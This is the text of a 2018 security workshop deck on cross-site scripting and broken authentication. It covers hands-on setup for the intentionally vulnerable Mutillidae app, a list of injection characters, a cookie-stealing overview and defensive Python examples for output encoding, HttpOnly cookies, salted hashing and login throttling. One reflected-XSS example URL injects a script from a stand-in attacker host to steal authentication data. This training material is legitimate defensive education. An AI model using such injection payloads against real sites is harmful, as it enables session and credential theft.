Cross-Site Scripting &
Broken Authentication
VodQA Chennai— September 2018
Abinaya V and Agalya D
Agenda
● What is XSS?
● Types of XSS with hands-on
● Cookie stealing
● Prevention of XSS
● Broken Authentication
● Privilege escalation
● Brute force
● Mitigation of Broken Authentication
Cross-Site Scripting
A7:2017-Cross-Site Scripting (XSS)
A3:2013-Cross-Site Scripting (XSS)
What is XSS?
- Client-side code injection attack
- Injecting malicious code into a vulnerable web application
Consequences
- Steal the user’s cookie for the domain
- Scrape or modify the content, bypassing the Same-Origin Policy
- Trojan horse programs could be injected
- Gather information from the victim’s browser: account, cookies, other sensitive information
Sites hacked!
XSS in eBay
Types of XSS
- Reflected (non-persistent)
- Stored (persistent)
- DOM based XSS
Reflected XSS
Example: http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"
HANDS-ON
SET-UP INSTRUCTIONS:
Participants using the Mutillidae Docker image:
1. Install Docker
2. Install the Mutillidae app using the docker command:
   docker run -d -p 80:80 -p 443:443 --name owasp17 bltsec/mutillidae-docker
3. Open the Mutillidae app: http://localhost/mutillidae/
   The first time, it will be redirected to http://localhost/mutillidae/database-offline.php
4. Click “setup/reset the DB” to set up the database
Participants using the VirtualBox OVA image:
1. Access the app using the URL: http://192.168.56.180/mutillidae/index.php?
Change browser proxy settings:
Firefox --> Preferences --> Network Proxy --> Settings --> ‘Manual Proxy Configuration’
Attack strings
"
>
<a
;
//
%
Stored XSS
1. Injects bad script
2. Request content
3. Receives bad script
4. Steal valuable data
HANDS-ON
Cookie stealing
Attacker’s server: server to receive cookies when the malicious script is run
Victim’s web application: malicious script is run when the vulnerable page loads
How to prevent?
- Vigilance
- Sanitisation or validation of user input
- Use HttpOnly flag in the HTTP response header
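An added example (not from the deck or from Mutillidae) showing the last two preventions above on the deck’s own reflected-search URL: the “before” handler reflects `q` unencoded, the hardened one HTML-encodes it, and the session cookie is issued with HttpOnly so a script that does run cannot read `document.cookie`. The parameter name `q` is the deck’s; the cookie name `sessionid` is assumed.

```python
import html
from http import cookies
from urllib.parse import parse_qs

# Constructed query string modelled on the deck's reflected-XSS example URL.
SAMPLE_QUERY = 'q=news<script src="http://hackersite.com/authstealer.js"></script>'


def vulnerable_search_page(query_string: str) -> str:
    """'Before' form: reflects the q parameter straight into the HTML body."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {q}</h1>"


def hardened_search_page(query_string: str) -> str:
    """Output-encode the reflected value so the browser renders it as text.

    quote=True also encodes " and ', which matters when the value lands
    inside an attribute rather than in element content.
    """
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie header for the session id (name 'sessionid' assumed).

    HttpOnly keeps the cookie out of document.cookie, Secure keeps it off
    plain HTTP, and SameSite=Lax limits cross-site sending.
    """
    jar = cookies.SimpleCookie()
    jar["sessionid"] = session_id
    jar["sessionid"]["httponly"] = True
    jar["sessionid"]["secure"] = True
    jar["sessionid"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")
```

Encoding is context-specific: `html.escape` is right for element content and quoted attributes, not for values placed inside JavaScript or URLs.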
Broken Authentication
A2:2017-Broken Authentication
These types of weaknesses can allow an attacker to either capture or bypass the authentication methods that are used by a web application.
The goal of an attack is to take over one or more accounts.
● User authentication credentials are not protected when stored.
● Predictable login credentials
● Passwords, session IDs, and other credentials are sent over unencrypted connections.
● Application’s timeout is not set properly
● URL rewriting, e.g.
  http://site.com/sale;jsessionid=2P9GC2JSNDLPSKHCJUN5TU?dest=Europe
LinkedIn Data Breach:
50 easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach.
Passwords were stored in SHA1 with no salting.
Source: LeakedSource
Privilege escalation via cookie tampering
Prevention
- Implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential reuse attacks
- Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected.
- Do not deploy with any default credentials, particularly for admin users
- Implement weak-password checks
- Have password rotation policies
- Session IDs should not be in the URL; they should be securely stored and invalidated after logout, idle, and absolute timeouts.
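An added example (not from the deck) in Python covering three of the points above: salted, iterated password hashing (the opposite of the unsalted SHA1 in the LinkedIn slide), a weak-password check against a common-password list, and a login throttle that doubles the delay per failure, logs every failure and raises an alert at the lockout threshold. The deny list and the threshold of 5 are constructed for the example; a real deployment would load a SecLists-style file.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a common-password list such as the SecLists files.
COMMON_PASSWORDS = {"123456", "password", "linkedin", "qwerty", "111111"}
PBKDF2_ROUNDS = 600_000  # iteration count; chosen for the example


def is_weak_password(pw: str) -> bool:
    """Reject short passwords and anything on the common-password list."""
    return len(pw) < 12 or pw.lower() in COMMON_PASSWORDS


def hash_password(pw: str, salt: bytes = b"") -> tuple:
    """Return (salt, digest); a fresh random salt is drawn when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(pw: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison against the stored salted digest."""
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


class LoginThrottle:
    """Increasing delay per failed attempt, lockout, and a failure log."""

    def __init__(self, lockout_after: int = 5):
        self.failures = {}          # user -> consecutive failure count
        self.lockout_after = lockout_after
        self.log = []               # lines an admin alert would be built from

    def delay_seconds(self, user: str) -> float:
        """0 s for a clean user, then 1, 2, 4, 8 ... seconds per failure."""
        n = self.failures.get(user, 0)
        return 0.0 if n == 0 else float(2 ** (n - 1))

    def is_locked(self, user: str) -> bool:
        return self.failures.get(user, 0) >= self.lockout_after

    def record_failure(self, user: str) -> None:
        self.failures[user] = self.failures.get(user, 0) + 1
        self.log.append(f"login failure user={user} count={self.failures[user]}")
        if self.is_locked(user):
            self.log.append(f"ALERT possible brute force against user={user}")

    def record_success(self, user: str) -> None:
        # Caller must check is_locked() before attempting the password at all.
        self.failures.pop(user, None)
```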
References
- https://www.owasp.org/index.php
- https://sourceforge.net/projects/mutillidae/
- https://www.cvedetails.com/about-contact.php
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/
THANKS
Email
abinayav@thoughtworks.com
agalyad@thoughtworks.com